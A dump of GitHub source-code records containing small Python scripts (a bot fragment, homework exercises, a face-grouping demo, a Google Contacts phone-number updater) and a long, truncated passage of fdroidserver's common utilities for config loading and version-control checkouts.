\r\n\r\n    # old style:\r\n    # await bot.send_message(message.chat.id, message.text)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    executor.start_polling(dp, skip_updates=True)","repo_name":"goldstar2705/goldwiki","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"5354970879","text":"# exercise 1\n\ndef address_book():\n    book = {}\n    while True:\n        key_name = input('What is the name of the person you would like to add to your address book? ')\n        if key_name not in book:\n            book[key_name] = input(f\"What is {key_name}'s address? \")\n        else:\n            current_address = input(\n                f\"The address we have on file for this person is {book[key_name]}. Is this correct? y/n\")\n            if current_address == 'n':\n                new_address = input(f\"What is {key_name}'s new address? \")\n                book[key_name] = new_address\n            else:\n                print(\"Great! Thank you for confirming.\")\n        next = input(\"Would you like to add another person to the address book? y/n \")\n        if next == 'n':\n            break\n    for key, value in book.items():\n        print(f\"{key} lives at {value}\")\n\naddress_book()\nbook = {}\n\n\n\n# exercise 2\nperson1 = ['09:00', '10:30', '11:30', '12:00', '13:00', '14:30']\nperson2 = ['09:30', '10:00', '10:30', '12:00', '14:30', '16:00']\nperson3 = ['09:00', '09:30', '11:00', '11:30', '12:00', '13:30', '14:30', '15:00']\nperson4 = ['11:00', '11:30', '12:00', '14:00', '14:30', '16:30', '17:00']\n\ndef avail_meet_times(original_list, *args):\n    orig_set = set(original_list)\n    # print(orig_set)\n    for person_avail in args:\n        avail_set = set(person_avail)\n        orig_set = orig_set.intersection(avail_set)\n    print(orig_set)\n\n\navail_meet_times(person1, person2, person3, person4)","repo_name":"vovan2101/week2-day5-homework","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"4125939533","text":"# First, you need to install the required libraries: requests, opencv-python-headless, and face_recognition.\n# You can install face_recognition by running !pip install face_recognition\n\nimport os\nimport requests\nimport shutil\nimport cv2\nimport face_recognition\n\n# Function to download images from a URL and save them locally\ndef download_images(url_list):\n    \n    for idx, url in enumerate(url_list):\n        response = requests.get(url, stream=True)\n        with open(f'image_{idx}.jpg', 'wb') as out_file:\n            shutil.copyfileobj(response.raw, out_file)\n        del response\n    \n    print('Images downloaded')\n    \n# Function to find faces in images and save them as thumbnail in a local folder\ndef identify_and_save_faces():\n    \n    # Keep track of the identified faces and the group folder assigned to each one\n    known_face_encodings = []\n    known_face_paths = []\n\n    for filename in os.listdir():\n        if filename.endswith('.jpg'):\n            \n            img_path = os.path.abspath(filename)\n            img = cv2.imread(img_path)\n\n            rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n            face_locations = face_recognition.face_locations(rgb_img)\n            face_encodings = face_recognition.face_encodings(rgb_img, face_locations)\n            \n            if face_encodings:\n                # Save the face thumbnail in a local folder\n                top, right, bottom, left = face_locations[0]\n                name = f\"{filename.split('.')[0]}_{top}_{right}_{bottom}_{left}\"\n                os.makedirs('faces', exist_ok=True)  # make sure the output folder exists\n                cv2.imwrite(f'faces/{name}.jpg', img[top:bottom, left:right])\n
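                # compare_faces (used below) also accepts a tolerance parameter; the default\n                # is 0.6 and a lower value is stricter, e.g.:\n                #   face_recognition.compare_faces([known_encoding], candidate_encoding, tolerance=0.5)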
\n                \n                # Identify whether this face was seen before and file the image into that\n                # group's folder, or start a new group folder for a first-time face\n                face_found = False\n                for i, encoding in enumerate(known_face_encodings):\n                    match = face_recognition.compare_faces([encoding], face_encodings[0])\n                    if match[0]:\n                        face_found = True\n                        shutil.move(img_path, os.path.join(known_face_paths[i], filename))\n                        break\n                \n                if not face_found:\n                    known_face_encodings.append(face_encodings[0])\n                    group_dir = os.path.abspath(f\"faces/Group{len(known_face_encodings)}\")\n                    os.makedirs(group_dir, exist_ok=True)\n                    known_face_paths.append(group_dir)\n                    shutil.move(img_path, os.path.join(group_dir, filename))\n            \n            else:\n                # If no face is found just delete the image\n                os.remove(img_path)\n\n    print('Faces identified and saved') \n    \n\n# Public repository urls where the script can get imagery, this is an example \nimage_urls = [\n    'https://www.publicdomainpictures.net/pictures/40000/nahled/plain-blue-background.jpg',\n    'https://www.publicdomainpictures.net/pictures/200000/nahled/sunrise-over-istanbul.jpg',\n    'https://www.publicdomainpictures.net/pictures/100000/nahled/tulips-in-bloom.jpg',\n    'https://www.publicdomainpictures.net/pictures/320000/nahled/seagull.jpg', \n    'https://www.publicdomainpictures.net/pictures/310000/nahled/shark-swimming-underwater.jpg',\n    'https://www.publicdomainpictures.net/pictures/190000/nahled/mountain-landscape.jpg',\n    'https://www.publicdomainpictures.net/pictures/150000/nahled/red-car.jpg', \n    'https://www.publicdomainpictures.net/pictures/170000/nahled/macaw.jpg',\n    'https://www.publicdomainpictures.net/pictures/10000/nahled/abstract-autumn-colors.jpg',\n    'https://www.publicdomainpictures.net/pictures/220000/nahled/cutlery-classic-kitchen-knife.jpg'\n]\n\n# Download the images\ndownload_images(image_urls)\n\n# Identify the faces in the images and save them as a thumbnail \nidentify_and_save_faces()\n\n# Delete the original images\nfor filename in os.listdir():\n    if filename.endswith('.jpg'):\n        os.remove(filename)\n\nprint(\"Process Complete\") \n","repo_name":"sarment0/face-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"33589571402","text":"#!/usr/bin/env python\n# vi:ts=4:sw=4:et\n\n# Mass phone numbers updater for Google contacts.\n#\n# Example usage:\n#\n# ./gpu.py -u <user> -p <password> -s '-' '' -s ' ' '' -s '^0(\\d{9})$' '+33\\1'\n#\n# This would strip spaces and '-' characters, and format 10-digit phone\n# numbers starting with a 0 (supposedly french ones) to use the international\n# +33 ... 
notation (useful when you're traveling).\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__author__ = 'Maxime Henrion <mhenrion@gmail.com>'\n\nimport argparse\nimport re\n\n# GData related imports\nimport gdata.data\nimport gdata.contacts.data\nimport gdata.contacts.client\n\n# Known phone number types at the time of this writing (for display only).\nphone_types = {\n gdata.data.FAX_REL: 'fax',\n gdata.data.HOME_REL: 'home',\n gdata.data.HOME_FAX_REL: 'home fax',\n gdata.data.MOBILE_REL: 'mobile',\n gdata.data.OTHER_REL: 'other',\n gdata.data.PAGER_REL: 'pager',\n gdata.data.WORK_REL: 'work',\n gdata.data.WORK_FAX_REL: 'work fax'\n}\n\n# Return all contacts using python generators for convenience.\ndef get_all_contacts(client, size=128):\n query = gdata.contacts.client.ContactsQuery()\n query.start_index = 1\n query.max_results = size\n\n done = False\n while not done:\n feed = client.GetContacts(q=query)\n num = 0\n for contact in feed.entry:\n yield contact\n num += 1\n if num < size:\n done = True\n else:\n query.start_index += size\n\ndef update_contact(contact, subs):\n updates = []\n for phone in contact.phone_number:\n old = phone.text\n new = old\n for pattern, repl in subs:\n new = re.sub(pattern, repl, new)\n if new != old:\n phone.text = new\n updates.append((phone, old))\n return updates\n\ndef confirm(prompt, choices=None, default=None):\n if choices is None:\n choices = ('yY', 'nN')\n ans = raw_input(prompt)\n for i, choice in enumerate(choices):\n if ans in choice:\n return choice[0]\n return default\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=True)\nparser.add_argument('-p', '--password', required=True)\nparser.add_argument('-n', '--dry-run', action='store_true')\nparser.add_argument('-y', '--yes', action='store_true')\nparser.add_argument('-s', '--sub', nargs=2, action='append')\nargs = parser.parse_args()\n\nclient = gdata.contacts.client.ContactsClient(source='Mux-ContactsUpdater-1')\nclient.ClientLogin(args.user, args.password, client.source)\n\nfor contact in get_all_contacts(client):\n if contact.name is None:\n name = '(no name)'\n else:\n name = contact.name.full_name.text\n\n if not args.sub:\n if contact.phone_number:\n print('{0} :'.format(name))\n for phone in contact.phone_number:\n phone_type = phone_types.get(phone.rel, 'unknown')\n print(' {0} ({1})'.format(phone.text, phone_type))\n continue\n\n updates = update_contact(contact, args.sub)\n if not updates:\n continue\n\n print('Updating contact \"{0}\" :'.format(name))\n for phone, old in updates:\n phone_type = phone_types.get(phone.rel, 'unknown')\n print(' {0} -> {1} ({2})'.format(old, phone.text, phone_type))\n if args.dry_run:\n continue\n\n if not args.yes:\n key = confirm('Really update (N/y/a) ? 
', ('nN', 'yY', 'aA'), 'n')\n if key == 'n':\n continue\n if key == 'a':\n args.yes = True\n\n # We should handle Etags mismatch here, but since this is intended to\n # be used as an interactive application, it doesn't really matter.\n client.Update(contact)\n","repo_name":"mux/stuff","sub_path":"gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11478564890","text":"import io\nimport os\nimport sys\nimport re\nimport shutil\nimport glob\nimport stat\nimport subprocess\nimport time\nimport operator\nimport logging\nimport hashlib\nimport socket\nimport base64\nimport xml.etree.ElementTree as XMLElementTree\n\nfrom queue import Queue\n\nfrom zipfile import ZipFile\n\nimport fdroidserver.metadata\nfrom .asynchronousfilereader import AsynchronousFileReader\n\n\nXMLElementTree.register_namespace('android', 'http://schemas.android.com/apk/res/android')\n\nconfig = None\noptions = None\nenv = None\norig_path = None\n\n\ndefault_config = {\n 'sdk_path': \"$ANDROID_HOME\",\n 'ndk_paths': {\n 'r9b': None,\n 'r10e': None,\n 'r11c': None,\n 'r12b': \"$ANDROID_NDK\",\n },\n 'qt_sdk_path': None,\n 'build_tools': \"24.0.2\",\n 'force_build_tools': False,\n 'java_paths': None,\n 'ant': \"ant\",\n 'mvn3': \"mvn\",\n 'gradle': 'gradle',\n 'accepted_formats': ['txt', 'yml'],\n 'sync_from_local_copy_dir': False,\n 'per_app_repos': False,\n 'make_current_version_link': True,\n 'current_version_name_source': 'Name',\n 'update_stats': False,\n 'stats_ignore': [],\n 'stats_server': None,\n 'stats_user': None,\n 'stats_to_carbon': False,\n 'repo_maxage': 0,\n 'build_server_always': False,\n 'keystore': 'keystore.jks',\n 'smartcardoptions': [],\n 'char_limits': {\n 'Summary': 80,\n 'Description': 4000,\n },\n 'keyaliases': {},\n 'repo_url': \"https://MyFirstFDroidRepo.org/fdroid/repo\",\n 'repo_name': \"My First FDroid Repo Demo\",\n 'repo_icon': \"fdroid-icon.png\",\n 'repo_description': '''\n This is a repository of apps to be used with FDroid. 
Applications in this\n repository are either official binaries built by the original application\n developers, or are binaries built from source by the admin of f-droid.org\n using the tools on https://gitlab.com/u/fdroid.\n ''',\n 'archive_older': 0,\n}\n\n\ndef setup_global_opts(parser):\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"Spew out even more information than normal\")\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\", default=False,\n help=\"Restrict output to warnings and errors\")\n\n\ndef fill_config_defaults(thisconfig):\n for k, v in default_config.items():\n if k not in thisconfig:\n thisconfig[k] = v\n\n # Expand paths (~users and $vars)\n def expand_path(path):\n if path is None:\n return None\n orig = path\n path = os.path.expanduser(path)\n path = os.path.expandvars(path)\n if orig == path:\n return None\n return path\n\n for k in ['sdk_path', 'ant', 'mvn3', 'gradle', 'keystore', 'repo_icon']:\n v = thisconfig[k]\n exp = expand_path(v)\n if exp is not None:\n thisconfig[k] = exp\n thisconfig[k + '_orig'] = v\n\n # find all installed JDKs for keytool, jarsigner, and JAVA[6-9]_HOME env vars\n if thisconfig['java_paths'] is None:\n thisconfig['java_paths'] = dict()\n pathlist = []\n pathlist += glob.glob('/usr/lib/jvm/j*[6-9]*')\n pathlist += glob.glob('/usr/java/jdk1.[6-9]*')\n pathlist += glob.glob('/System/Library/Java/JavaVirtualMachines/1.[6-9].0.jdk')\n pathlist += glob.glob('/Library/Java/JavaVirtualMachines/*jdk*[6-9]*')\n if os.getenv('JAVA_HOME') is not None:\n pathlist.append(os.getenv('JAVA_HOME'))\n if os.getenv('PROGRAMFILES') is not None:\n pathlist += glob.glob(os.path.join(os.getenv('PROGRAMFILES'), 'Java', 'jdk1.[6-9].*'))\n for d in sorted(pathlist):\n if os.path.islink(d):\n continue\n j = os.path.basename(d)\n # the last one found will be the canonical one, so order appropriately\n for regex in [\n r'^1\\.([6-9])\\.0\\.jdk$', # OSX\n r'^jdk1\\.([6-9])\\.0_[0-9]+.jdk$', # OSX and Oracle tarball\n r'^jdk1\\.([6-9])\\.0_[0-9]+$', # Oracle Windows\n r'^jdk([6-9])-openjdk$', # Arch\n r'^java-([6-9])-openjdk$', # Arch\n r'^java-([6-9])-jdk$', # Arch (oracle)\n r'^java-1\\.([6-9])\\.0-.*$', # RedHat\n r'^java-([6-9])-oracle$', # Debian WebUpd8\n r'^jdk-([6-9])-oracle-.*$', # Debian make-jpkg\n r'^java-([6-9])-openjdk-[^c][^o][^m].*$', # Debian\n ]:\n m = re.match(regex, j)\n if not m:\n continue\n for p in [d, os.path.join(d, 'Contents', 'Home')]:\n if os.path.exists(os.path.join(p, 'bin', 'javac')):\n thisconfig['java_paths'][m.group(1)] = p\n\n for java_version in ('7', '8', '9'):\n if java_version not in thisconfig['java_paths']:\n continue\n java_home = thisconfig['java_paths'][java_version]\n jarsigner = os.path.join(java_home, 'bin', 'jarsigner')\n if os.path.exists(jarsigner):\n thisconfig['jarsigner'] = jarsigner\n thisconfig['keytool'] = os.path.join(java_home, 'bin', 'keytool')\n break # Java7 is preferred, so quit if found\n\n for k in ['ndk_paths', 'java_paths']:\n d = thisconfig[k]\n for k2 in d.copy():\n v = d[k2]\n exp = expand_path(v)\n if exp is not None:\n thisconfig[k][k2] = exp\n thisconfig[k][k2 + '_orig'] = v\n\n\ndef regsub_file(pattern, repl, path):\n with open(path, 'rb') as f:\n text = f.read()\n text = re.sub(bytes(pattern, 'utf8'), bytes(repl, 'utf8'), text)\n with open(path, 'wb') as f:\n f.write(text)\n\n\ndef read_config(opts, config_file='config.py'):\n \"\"\"Read the repository config\n\n The config is read from config_file, which is in the current\n directory when 
any of the repo management commands are used. If\n there is a local metadata file in the git repo, then config.py is\n not required, just use defaults.\n\n \"\"\"\n global config, options\n\n if config is not None:\n return config\n\n options = opts\n\n config = {}\n\n if os.path.isfile(config_file):\n logging.debug(\"Reading %s\" % config_file)\n with io.open(config_file, \"rb\") as f:\n code = compile(f.read(), config_file, 'exec')\n exec(code, None, config)\n elif len(get_local_metadata_files()) == 0:\n logging.critical(\"Missing config file - is this a repo directory?\")\n sys.exit(2)\n\n # smartcardoptions must be a list since its command line args for Popen\n if 'smartcardoptions' in config:\n config['smartcardoptions'] = config['smartcardoptions'].split(' ')\n elif 'keystore' in config and config['keystore'] == 'NONE':\n # keystore='NONE' means use smartcard, these are required defaults\n config['smartcardoptions'] = ['-storetype', 'PKCS11', '-providerName',\n 'SunPKCS11-OpenSC', '-providerClass',\n 'sun.security.pkcs11.SunPKCS11',\n '-providerArg', 'opensc-fdroid.cfg']\n\n if any(k in config for k in [\"keystore\", \"keystorepass\", \"keypass\"]):\n st = os.stat(config_file)\n if st.st_mode & stat.S_IRWXG or st.st_mode & stat.S_IRWXO:\n logging.warn(\"unsafe permissions on {0} (should be 0600)!\".format(config_file))\n\n fill_config_defaults(config)\n\n for k in [\"keystorepass\", \"keypass\"]:\n if k in config:\n write_password_file(k)\n\n for k in [\"repo_description\", \"archive_description\"]:\n if k in config:\n config[k] = clean_description(config[k])\n\n if 'serverwebroot' in config:\n if isinstance(config['serverwebroot'], str):\n roots = [config['serverwebroot']]\n elif all(isinstance(item, str) for item in config['serverwebroot']):\n roots = config['serverwebroot']\n else:\n raise TypeError('only accepts strings, lists, and tuples')\n rootlist = []\n for rootstr in roots:\n # since this is used with rsync, where trailing slashes have\n # meaning, ensure there is always a trailing slash\n if rootstr[-1] != '/':\n rootstr += '/'\n rootlist.append(rootstr.replace('//', '/'))\n config['serverwebroot'] = rootlist\n\n return config\n\n\ndef find_sdk_tools_cmd(cmd):\n '''find a working path to a tool from the Android SDK'''\n\n tooldirs = []\n if config is not None and 'sdk_path' in config and os.path.exists(config['sdk_path']):\n # try to find a working path to this command, in all the recent possible paths\n if 'build_tools' in config:\n build_tools = os.path.join(config['sdk_path'], 'build-tools')\n # if 'build_tools' was manually set and exists, check only that one\n configed_build_tools = os.path.join(build_tools, config['build_tools'])\n if os.path.exists(configed_build_tools):\n tooldirs.append(configed_build_tools)\n else:\n # no configed version, so hunt known paths for it\n for f in sorted(os.listdir(build_tools), reverse=True):\n if os.path.isdir(os.path.join(build_tools, f)):\n tooldirs.append(os.path.join(build_tools, f))\n tooldirs.append(build_tools)\n sdk_tools = os.path.join(config['sdk_path'], 'tools')\n if os.path.exists(sdk_tools):\n tooldirs.append(sdk_tools)\n sdk_platform_tools = os.path.join(config['sdk_path'], 'platform-tools')\n if os.path.exists(sdk_platform_tools):\n tooldirs.append(sdk_platform_tools)\n tooldirs.append('/usr/bin')\n for d in tooldirs:\n if os.path.isfile(os.path.join(d, cmd)):\n return os.path.join(d, cmd)\n # did not find the command, exit with error message\n ensure_build_tools_exists(config)\n\n\ndef test_sdk_exists(thisconfig):\n 
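# When no sdk_path is configured, a standalone 'aapt' binary is accepted as a\n    # substitute for a full SDK; otherwise the configured path is validated below.\n    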
def test_sdk_exists(thisconfig):\n if 'sdk_path' not in thisconfig:\n if 'aapt' in thisconfig and os.path.isfile(thisconfig['aapt']):\n return True\n else:\n logging.error(\"'sdk_path' not set in config.py!\")\n return False\n if thisconfig['sdk_path'] == default_config['sdk_path']:\n logging.error('No Android SDK found!')\n logging.error('You can use ANDROID_HOME to set the path to your SDK, i.e.:')\n logging.error('\\texport ANDROID_HOME=/opt/android-sdk')\n return False\n if not os.path.exists(thisconfig['sdk_path']):\n logging.critical('Android SDK path \"' + thisconfig['sdk_path'] + '\" does not exist!')\n return False\n if not os.path.isdir(thisconfig['sdk_path']):\n logging.critical('Android SDK path \"' + thisconfig['sdk_path'] + '\" is not a directory!')\n return False\n for d in ['build-tools', 'platform-tools', 'tools']:\n if not os.path.isdir(os.path.join(thisconfig['sdk_path'], d)):\n logging.critical('Android SDK path \"%s\" does not contain \"%s/\"!' % (\n thisconfig['sdk_path'], d))\n return False\n return True\n\n\ndef ensure_build_tools_exists(thisconfig):\n if not test_sdk_exists(thisconfig):\n sys.exit(3)\n build_tools = os.path.join(thisconfig['sdk_path'], 'build-tools')\n versioned_build_tools = os.path.join(build_tools, thisconfig['build_tools'])\n if not os.path.isdir(versioned_build_tools):\n logging.critical('Android Build Tools path \"'\n + versioned_build_tools + '\" does not exist!')\n sys.exit(3)\n\n\ndef write_password_file(pwtype, password=None):\n '''\n writes out passwords to a protected file instead of passing passwords as\n command line arguments\n '''\n filename = '.fdroid.' + pwtype + '.txt'\n fd = os.open(filename, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o600)\n if password is None:\n os.write(fd, config[pwtype].encode('utf-8'))\n else:\n os.write(fd, password.encode('utf-8'))\n os.close(fd)\n config[pwtype + 'file'] = filename\n\n\ndef get_local_metadata_files():\n '''get any metadata files local to an app's source repo\n\n This tries to ignore anything that does not count as app metadata,\n including emacs cruft ending in ~ and the .fdroid.key*pass.txt files.\n\n '''\n return glob.glob('.fdroid.[a-jl-z]*[a-rt-z]')\n\n\n# Given the arguments in the form of multiple appid:[vc] strings, this returns\n# a dictionary with the set of vercodes specified for each package.\ndef read_pkg_args(args, allow_vercodes=False):\n\n vercodes = {}\n if not args:\n return vercodes\n\n for p in args:\n if allow_vercodes and ':' in p:\n package, vercode = p.split(':')\n else:\n package, vercode = p, None\n if package not in vercodes:\n vercodes[package] = [vercode] if vercode else []\n continue\n elif vercode and vercode not in vercodes[package]:\n vercodes[package] += [vercode] if vercode else []\n\n return vercodes\n\n\n
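# Quick illustration of read_pkg_args (hypothetical session, not part of the original\n# module):\n#\n# >>> read_pkg_args(['org.app:10', 'org.app:11', 'org.other'], allow_vercodes=True)\n# {'org.app': ['10', '11'], 'org.other': []}\n#\n# With allow_vercodes=False, a full 'appid:vc' string would be treated as the package id.\n\n\n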
# On top of what read_pkg_args does, this returns the whole app metadata, but\n# limiting the builds list to the builds matching the vercodes specified.\ndef read_app_args(args, allapps, allow_vercodes=False):\n\n vercodes = read_pkg_args(args, allow_vercodes)\n\n if not vercodes:\n return allapps\n\n apps = {}\n for appid, app in allapps.items():\n if appid in vercodes:\n apps[appid] = app\n\n if len(apps) != len(vercodes):\n for p in vercodes:\n if p not in allapps:\n logging.critical(\"No such package: %s\" % p)\n raise FDroidException(\"Found invalid app ids in arguments\")\n if not apps:\n raise FDroidException(\"No packages specified\")\n\n error = False\n for appid, app in apps.items():\n vc = vercodes[appid]\n if not vc:\n continue\n app.builds = [b for b in app.builds if b.vercode in vc]\n if len(app.builds) != len(vercodes[appid]):\n error = True\n allvcs = [b.vercode for b in app.builds]\n for v in vercodes[appid]:\n if v not in allvcs:\n logging.critical(\"No such vercode %s for app %s\" % (v, appid))\n\n if error:\n raise FDroidException(\"Found invalid vercodes for some apps\")\n\n return apps\n\n\ndef get_extension(filename):\n base, ext = os.path.splitext(filename)\n if not ext:\n return base, ''\n return base, ext.lower()[1:]\n\n\ndef has_extension(filename, ext):\n _, f_ext = get_extension(filename)\n return ext == f_ext\n\n\napk_regex = re.compile(r\"^(.+)_([0-9]+)\\.apk$\")\n\n\ndef clean_description(description):\n 'Remove unneeded newlines and spaces from a block of description text'\n returnstring = ''\n # this is split up by paragraph to make removing the newlines easier\n for paragraph in re.split(r'\\n\\n', description):\n paragraph = re.sub('\\r', '', paragraph)\n paragraph = re.sub('\\n', ' ', paragraph)\n paragraph = re.sub(' {2,}', ' ', paragraph)\n paragraph = re.sub('^\\s*(\\w)', r'\\1', paragraph)\n returnstring += paragraph + '\\n\\n'\n return returnstring.rstrip('\\n')\n\n\ndef apknameinfo(filename):\n filename = os.path.basename(filename)\n m = apk_regex.match(filename)\n try:\n result = (m.group(1), m.group(2))\n except AttributeError:\n raise FDroidException(\"Invalid apk name: %s\" % filename)\n return result\n\n\ndef getapkname(app, build):\n return \"%s_%s.apk\" % (app.id, build.vercode)\n\n\ndef getsrcname(app, build):\n return \"%s_%s_src.tar.gz\" % (app.id, build.vercode)\n\n\ndef getappname(app):\n if app.Name:\n return app.Name\n if app.AutoName:\n return app.AutoName\n return app.id\n\n\ndef getcvname(app):\n return '%s (%s)' % (app.CurrentVersion, app.CurrentVersionCode)\n\n\ndef getvcs(vcstype, remote, local):\n if vcstype == 'git':\n return vcs_git(remote, local)\n if vcstype == 'git-svn':\n return vcs_gitsvn(remote, local)\n if vcstype == 'hg':\n return vcs_hg(remote, local)\n if vcstype == 'bzr':\n return vcs_bzr(remote, local)\n if vcstype == 'srclib':\n if local != os.path.join('build', 'srclib', remote):\n raise VCSException(\"Error: srclib paths are hard-coded!\")\n return getsrclib(remote, os.path.join('build', 'srclib'), raw=True)\n if vcstype == 'svn':\n raise VCSException(\"Deprecated vcs type 'svn' - please use 'git-svn' instead\")\n raise VCSException(\"Invalid vcs type \" + vcstype)\n\n\ndef getsrclibvcs(name):\n if name not in fdroidserver.metadata.srclibs:\n raise VCSException(\"Missing srclib \" + name)\n return fdroidserver.metadata.srclibs[name]['Repo Type']\n\n\nclass vcs:\n\n def __init__(self, remote, local):\n\n # svn, git-svn and bzr may require auth\n self.username = None\n if self.repotype() in ('git-svn', 'bzr'):\n if '@' in remote:\n if self.repotype() == 'git-svn':\n raise VCSException(\"Authentication is not supported for git-svn\")\n self.username, remote = remote.split('@')\n if ':' not in self.username:\n raise VCSException(\"Password required with username\")\n self.username, self.password = self.username.split(':')\n\n self.remote = remote\n self.local = local\n self.clone_failed = False\n self.refreshed = False\n self.srclib = None\n\n def repotype(self):\n return None\n\n
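 # Illustrative flow (hypothetical remote and paths, not part of the original module):\n #\n # vcs = getvcs('git', 'https://example.com/app.git', 'build/org.example.app')\n # vcs.gotorevision('v1.2.3') # clone or fetch as needed, then a clean checkout\n #\n # Subclasses below supply the VCS-specific steps via gotorevisionx().\n\n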
 # Take the local repository to a clean version of the given revision, which\n # is specified in the VCS's native format. Beforehand, the repository can\n # be dirty, or even non-existent. If the repository does already exist\n # locally, it will be updated from the origin, but only once in the\n # lifetime of the vcs object.\n # None is acceptable for 'rev' if you know you are cloning a clean copy of\n # the repo - otherwise it must specify a valid revision.\n def gotorevision(self, rev, refresh=True):\n\n if self.clone_failed:\n raise VCSException(\"Downloading the repository already failed once, not trying again.\")\n\n # The .fdroidvcs-id file for a repo tells us what VCS type\n # and remote that directory was created from, allowing us to drop it\n # automatically if either of those things changes.\n fdpath = os.path.join(self.local, '..',\n '.fdroidvcs-' + os.path.basename(self.local))\n fdpath = os.path.normpath(fdpath)\n cdata = self.repotype() + ' ' + self.remote\n writeback = True\n deleterepo = False\n if os.path.exists(self.local):\n if os.path.exists(fdpath):\n with open(fdpath, 'r') as f:\n fsdata = f.read().strip()\n if fsdata == cdata:\n writeback = False\n else:\n deleterepo = True\n logging.info(\"Repository details for %s changed - deleting\" % (\n self.local))\n else:\n deleterepo = True\n logging.info(\"Repository details for %s missing - deleting\" % (\n self.local))\n if deleterepo:\n shutil.rmtree(self.local)\n\n exc = None\n if not refresh:\n self.refreshed = True\n\n try:\n self.gotorevisionx(rev)\n except FDroidException as e:\n exc = e\n\n # If necessary, write the .fdroidvcs file.\n if writeback and not self.clone_failed:\n os.makedirs(os.path.dirname(fdpath), exist_ok=True)\n with open(fdpath, 'w+') as f:\n f.write(cdata)\n\n if exc is not None:\n raise exc\n\n # Derived classes need to implement this. It's called once basic checking\n # has been performed.\n def gotorevisionx(self, rev):\n raise VCSException(\"This VCS type doesn't define gotorevisionx\")\n\n # Initialise and update submodules\n def initsubmodules(self):\n raise VCSException('Submodules not supported for this vcs type')\n\n # Get a list of all known tags\n def gettags(self):\n if not self._gettags:\n raise VCSException('gettags not supported for this vcs type')\n rtags = []\n for tag in self._gettags():\n if re.match('[-A-Za-z0-9_. /]+$', tag):\n rtags.append(tag)\n return rtags\n\n # Get a list of all the known tags, sorted from newest to oldest\n def latesttags(self):\n raise VCSException('latesttags not supported for this vcs type')\n\n # Get current commit reference (hash, revision, etc)\n def getref(self):\n raise VCSException('getref not supported for this vcs type')\n\n # Returns the srclib (name, path) used in setting up the current\n # revision, or None.\n def getsrclib(self):\n return self.srclib\n\n\nclass vcs_git(vcs):\n\n def repotype(self):\n return 'git'\n\n # If the local directory exists, but is somehow not a git repository, git\n # will traverse up the directory tree until it finds one that is (i.e.\n # fdroidserver) and then we'll proceed to destroy it! 
This is called as\n # a safety check.\n def checkrepo(self):\n p = FDroidPopen(['git', 'rev-parse', '--show-toplevel'], cwd=self.local, output=False)\n result = p.output.rstrip()\n if not result.endswith(self.local):\n raise VCSException('Repository mismatch')\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n # Brand new checkout\n p = FDroidPopen(['git', 'clone', self.remote, self.local])\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git clone failed\", p.output)\n self.checkrepo()\n else:\n self.checkrepo()\n # Discard any working tree changes\n p = FDroidPopen(['git', 'submodule', 'foreach', '--recursive',\n 'git', 'reset', '--hard'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git reset failed\", p.output)\n # Remove untracked files now, in case they're tracked in the target\n # revision (it happens!)\n p = FDroidPopen(['git', 'submodule', 'foreach', '--recursive',\n 'git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n if not self.refreshed:\n # Get latest commits and tags from remote\n p = FDroidPopen(['git', 'fetch', 'origin'], cwd=self.local)\n if p.returncode != 0:\n raise VCSException(\"Git fetch failed\", p.output)\n p = FDroidPopen(['git', 'fetch', '--prune', '--tags', 'origin'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git fetch failed\", p.output)\n # Recreate origin/HEAD as git clone would do it, in case it disappeared\n p = FDroidPopen(['git', 'remote', 'set-head', 'origin', '--auto'], cwd=self.local, output=False)\n if p.returncode != 0:\n lines = p.output.splitlines()\n if 'Multiple remote HEAD branches' not in lines[0]:\n raise VCSException(\"Git remote set-head failed\", p.output)\n branch = lines[1].split(' ')[-1]\n p2 = FDroidPopen(['git', 'remote', 'set-head', 'origin', branch], cwd=self.local, output=False)\n if p2.returncode != 0:\n raise VCSException(\"Git remote set-head failed\", p.output + '\\n' + p2.output)\n self.refreshed = True\n # origin/HEAD is the HEAD of the remote, e.g. the \"default branch\" on\n # a github repo. 
Most of the time this is the same as origin/master.\n rev = rev or 'origin/HEAD'\n p = FDroidPopen(['git', 'checkout', '-f', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git checkout of '%s' failed\" % rev, p.output)\n # Get rid of any uncontrolled files left behind\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n\n def initsubmodules(self):\n self.checkrepo()\n submfile = os.path.join(self.local, '.gitmodules')\n if not os.path.isfile(submfile):\n raise VCSException(\"No git submodules available\")\n\n # fix submodules not accessible without an account and public key auth\n with open(submfile, 'r') as f:\n lines = f.readlines()\n with open(submfile, 'w') as f:\n for line in lines:\n if 'git@github.com' in line:\n line = line.replace('git@github.com:', 'https://github.com/')\n if 'git@gitlab.com' in line:\n line = line.replace('git@gitlab.com:', 'https://gitlab.com/')\n f.write(line)\n\n p = FDroidPopen(['git', 'submodule', 'sync'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git submodule sync failed\", p.output)\n p = FDroidPopen(['git', 'submodule', 'update', '--init', '--force', '--recursive'], 